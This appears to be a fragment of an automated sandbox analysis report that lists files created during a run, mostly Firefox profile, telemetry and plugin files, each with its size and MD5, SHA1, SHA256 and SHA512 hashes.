SHA512964d566538dab9977da900d5c8e24a7cf1da4b095f4820d2abd8fcd635cca231a82ab428a670b79324350e190c8aa47b97e94b20ab332a5e42dbd6dfbb92ab54
-
Filesize
9KB
MD592884c961172f657839deb46b86f94e8
SHA1c95b086d6340c7c1078323d4cdcb8069851d72d9
SHA25645661160409e34efc45c7a3baf49933689c47813e80d1c84133c9b6d46652c9b
SHA51231f6c8f761df010de1ccc6827059a3c4d9c7f4f9670f12b41ea2c5d136c8be1c3238e35a899e95aa23654f407daa83af5c141ed8d24b6b0d4c697f4eb3aa386c
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
464KB
MD51c6ca425f599a832443922058ff476da
SHA1f3765d385b5bebeb9c3264a75fd269225c590f8a
SHA25652713d5bdd995b9913e76b38fe351b164c836511eca96c5b75e47cbddd91728e
SHA512796a0f695b943d17ea5caab33cede9743e3cb59ca4afcbc195397cef86764abcd1c738aaac3165ccf90c5785ad9ea19397c473138e8f3fcf3284e3115ea6b5da
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin
Filesize18KB
MD51ad283f95edac5356cdddac2b974a015
SHA1727bc3297118a9e5c1d432a55a2e23fcd3f65ead
SHA256cffdbfcabf16c8bf374dec759301d3c4799ad49eef4cf717b9b6857ab58550d8
SHA5127d2ba32776a7647ceab7fbda6b1c818ca8dacaabbd7c50a11d10f07e5d6de0e06be85e332c66569fae8e12fe37468347b103ac9f16bcc6f2fc7b7862a93eb062
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin
Filesize10KB
MD50071e4c9433eb7727e6f8b02bab63a15
SHA171c0d2c538997a7453c393c93ecbbc78ce15a539
SHA256f9b8eff2bb118005e8f1e81a9004d3f58296fde844761fa1a2e7fef9b10258af
SHA5120f063030bedd835749fd2296f291a4c3d7016a9effa7005b77794e5ccfcac041c3ce71d4f8456f36d48f088864ec2094f2eadfe531a5f940abd47a8be40d69ca
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5bca73280261904ea48840d7d11d2b52a
SHA17ad5663ce88aa1a866aabf75dcf908b433623f9d
SHA2560c85b88349dbdf2b6f459879131ca8abbd94eef5401cb76b50b7c9a7c7613dc8
SHA512212c80ab6c2b4c3b20b50d2ad4924930636e5d5bc5613b4f7ba0be70132e0e975f674e773e56cccc9d9979ff061969f742f9063c2fbca8d2101949ee2bd6a230
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD51e87d698743cb7fb73f9306e652caeaf
SHA1967928d23346757e576fc2271850ab0660ac6519
SHA256b28daec5fe3840aabb437994ad36277f5c5d61fc72e7e15a7533dc6f7e1437b2
SHA5123f3718e72c6378dc7c997fe4d7eec37796d7316fd0cc998f4778f4b82ee466e97e6c248470579a718839a1a6e7de8fd0c1b80d51fb39a93afe1d0670c142f67e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize3KB
MD50e66e2c0f0638639f8d3194ea3593fca
SHA13272d07d6d63024a24efc1cdcf7d3f18010e495f
SHA2560f430a5046a7ef2b58a0a8582655a9135f9d3ead413d9cc938fc756713e4e75a
SHA512bc87a82ad917d0ac0b12b51a275adc9c180afa2a88baeffecf7869f49dfd132c37b0d18a6c60060c1b74454387f10abca2630f97bf34917b64a093d1d30a91b1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD595c2f98aa0acde589eb9c18c9fa331c5
SHA1feba1c4877f5a893beefaab66bdd56682f4b5a64
SHA2566624c146d0f23728c3588d95d12fc9f887845c6a2a705938d1099aae67bc820c
SHA512c616e13be17e86505c1747d37fcb344bd727a64df7d0d8dd8e8646e0c6c3f2f471e1e7e98a1b1ab642444aeb2406cba7726746360b02f2b4bac9222888a1cf38
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD550dbc51d37d605ea01779b9974c2c24a
SHA1cf9a0b2fdc12053c73c28bae878787c423eba21e
SHA256bfb1d4a09919035610f07e9a161b89a6483ebbcfaac02ec82e16d352253445d2
SHA512ddbd1bb8f4259b187d5994818607c904de7fa76c5b3c45268518134e46e999c58391446d128609563e2e9947b95fc7663b2aa1b16289fad7331742a3f5b9c040
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\08375900-4274-4a74-9352-7a2277b60d61
Filesize671B
MD505b34003e1f895fdda4891223d9c613a
SHA12828fd4e4ed75386d88ff39057b43953ba0b2246
SHA2565437bf35231ecafa8055c352aa42c9bfd60fd046d626fdba6f30b40beea79d12
SHA5121956dc5834fa7590f36be62d50381a9d382d3d4111724bf3420268febd1955b8e97b2937d0ce018b4067550d6f4387490e57cc5b9a31c96925040c9910da75b6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\eb9352c2-9430-4337-a2d8-da307e4d9242
Filesize28KB
MD54f88170d4cedfb5ae5701647e0f2224d
SHA163d61cce01e8458bcf5ad7298711a349f4adc3dc
SHA2560f9904ea431bc080045b5736e67be96fcea2555a64d6fb6b3adeab53e58d3d59
SHA5121dfc3822359f5d5b38024bd1fc7d93ded95c2662fc6b7fb864ead4bb473127f967bc09ee5d487256410161400f38d7b3ad695a2dda0d55f191c6378affd2d9aa
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\ee98e8e1-aca5-46df-9d5d-2432607e33b9
Filesize982B
MD518b6b5ff45be79169592656517a00c8f
SHA19d2ad527e3c535ac19b00182bceb58a05c2dc0c8
SHA256822412e501a1fca883247a0c935330c5e762be69c87b9cb524d7a09ea4960469
SHA5121fd52edf86adaa14db57b8431c2995d09137fc047a2a48b2165dd53308c25a66f3e8ab25e8191f29d2b900c433a97f8c72350a1d3bcf7c20f466bcacd82ef567
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD5f85a2a550acff722c0fa8cf3d6b00812
SHA12f24de66e5d3fb983d10bea509975879c5763dda
SHA2569a735c187164f781e7cc55196b49183bf06245f339942dace670e657ba2caeb9
SHA51207b717eebe5e38bbdb9ac7e371a5f7063873343cff112cc3d9ddf96c692ade446b5ec8e2b48b6e342c38bf8c6c9a3229a8dd971289e6dbb83502e59434f94b0c
-
Filesize
10KB
MD53639f55bcb4296b5c646d2ba822d16cd
SHA1656cc4e97c21f0b0bc3fc2e05e923b84a65d3f14
SHA256826d99a05e754347110826f1f6289c2a0fd305d2bdb31eed8d3d2abbc473282e
SHA512936e731b66b67d80e2c6f5c7e460ef4c7e7c5d43d959eeb90aff08bcb2339b0456a84eda879040f4adc2ef09457e5adcc8cc52e4e89e7950dc3e7a69e31a89c9
-
Filesize
15KB
MD54fe8ecc6881f782250ca2a5e20943131
SHA1125d774b90c657e026fdfa6053bc2a94688a1523
SHA256c66fc24ce3e71ab807c5c83f3175215902e74be599aa7af436d3b40ef06a5875
SHA5128a5b0263770283c4a14fd8fad86ae0630de97a06b77e6ff9c048bc62293e648bbb5c14608da7d09c0ba63d6712a406d4950a7c41d00af60679ef1300d6eec531
-
Filesize
10KB
MD5ca5f952ce3e1a9865eccb438a3ef8f4f
SHA1e968a4c1fdf59fd8254a37bb7469cbe90c8cd610
SHA256dfb0bb31884377f19c4e00f70679dfc004ad5dcb733a34d6bd8f4d6a70a50650
SHA51276431a2ef5199bc1e9d73b6e62815bb6aa71306318f3c81efa5300123b17fac22309c617998fb27d3a5551c8e04b6cc9ac59a839deebc9eeb37b0937f62bc13d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.0MB
MD5d9c6df380a6927575d3f37bf0a6012c9
SHA1c7be755b34aa77ff18f59e1b3beb0243b3415bcc
SHA2560d2bbbd0bee1aec8de734fd2e6c768ab8be71034ab3ff8948c37e8ab6b4c767f
SHA512d414a75765433a758659abc4605ca9e0e16303c879b6a1d03c30f2b4b606611b3496420fd12bd76ab3ad7ec733e0bfe1fcab3d2c0e97a2bf9db86f29bbae7929